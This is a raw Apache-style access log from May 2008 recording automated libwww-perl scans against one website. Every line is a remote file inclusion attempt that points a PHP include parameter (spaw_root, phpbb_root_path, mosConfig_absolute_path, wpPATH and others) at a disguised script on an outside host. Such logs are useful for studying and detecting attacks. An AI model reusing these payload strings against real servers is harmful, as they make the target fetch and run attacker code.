69.73.146.54 - - [04/May/2008:13:02:39 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:13:02:45 -0700] "GET /logs/access_071218.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:13:02:45 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:13:02:45 -0700] "GET /logs/access_071218.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:13:02:45 -0700] "GET /logs/access_071218.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:13:02:45 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:13:02:45 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:13:02:45 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:13:02:45 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:13:02:46 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:13:02:46 -0700] "GET /logs/access_071218.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:13:02:46 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:13:02:46 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:13:02:57 -0700] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:13:02:57 -0700] "GET /logs/access_071116.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:13:02:57 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.18.105.82 - - [04/May/2008:13:02:57 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:13:02:57 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:13:02:57 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:13:02:58 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.9.154.74 - - [04/May/2008:13:02:58 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.154.74 - - [04/May/2008:13:02:58 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.18.105.82 - - [04/May/2008:13:02:58 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:13:03:00 -0700] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:13:03:00 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:13:03:00 -0700] "GET /logs/access_071116.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:13:03:00 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:13:03:01 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:13:03:01 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:13:03:01 -0700] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:13:03:01 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:13:03:02 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:13:03:04 -0700] "GET /logs/access_080215.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:13:03:08 -0700] "GET /logs/access_080215.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:13:03:15 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.64.29 - - [04/May/2008:13:03:18 -0700] "GET /logs/access_071218.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.64.29 - - [04/May/2008:13:03:18 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.64.29 - - [04/May/2008:13:03:18 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:13:03:22 -0700] "GET /logs/access_071116.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:13:03:22 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:13:03:22 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.64.29 - - [04/May/2008:13:03:25 -0700] "GET /logs/access_080215.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:13:03:27 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:13:03:31 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.94.156 - - [04/May/2008:13:03:38 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.94.156 - - [04/May/2008:13:03:39 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:13:03:47 -0700] "GET /logs/access_080215.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:13:03:48 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:13:03:48 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:13:03:49 -0700] "GET /logs/access_080215.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:13:04:01 -0700] "GET /logs/access_071218.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:13:04:01 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:13:04:01 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:13:04:07 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:13:04:10 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:13:04:12 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:04:15 -0700] "GET /logs/access_080131.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:04:15 -0700] "GET /logs/access_080131.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:04:15 -0700] "GET /logs/access_080131.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:04:15 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:04:15 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:04:15 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:04:15 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:04:15 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:04:15 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:13:04:17 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:04:28 -0700] "GET /logs/access_080119.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:04:28 -0700] "GET /logs/access_080119.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:04:28 -0700] "GET /logs/access_080119.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.64.29 - - [04/May/2008:13:04:30 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:13:04:33 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:13:04:33 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:13:04:33 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:13:04:34 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:13:04:34 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:13:04:34 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:13:04:40 -0700] "GET /logs/access_080215.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:13:04:45 -0700] "GET /logs/access_080215.log/////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:13:04:46 -0700] "GET /logs/access_080215.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:13:04:47 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:13:04:47 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:13:04:48 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:13:04:49 -0700] "GET /////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:13:04:50 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 200 45991 "-" "libwww-perl/5.805" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:13:04:51 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:13:04:53 -0700] "GET /logs/access_071116.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:13:04:53 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:13:04:53 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:13:04:53 -0700] "GET /logs/access_080215.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:13:05:06 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:13:05:16 -0700] "GET /logs/access_071116.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:13:05:16 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:13:05:16 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.92.71.151 - - [04/May/2008:13:05:21 -0700] "GET /logs/access_080129.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.92.71.151 - - [04/May/2008:13:05:21 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.92.71.151 - - [04/May/2008:13:05:21 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.92.71.151 - - [04/May/2008:13:05:25 -0700] "GET /logs/access_080129.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.92.71.151 - - [04/May/2008:13:05:25 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.92.71.151 - - [04/May/2008:13:05:26 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:05:34 -0700] "GET /logs/access_080131.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:05:35 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:05:36 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:13:05:41 -0700] "GET /logs/access_071116.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:13:05:41 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:13:05:41 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:05:45 -0700] "GET /logs/access_080119.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
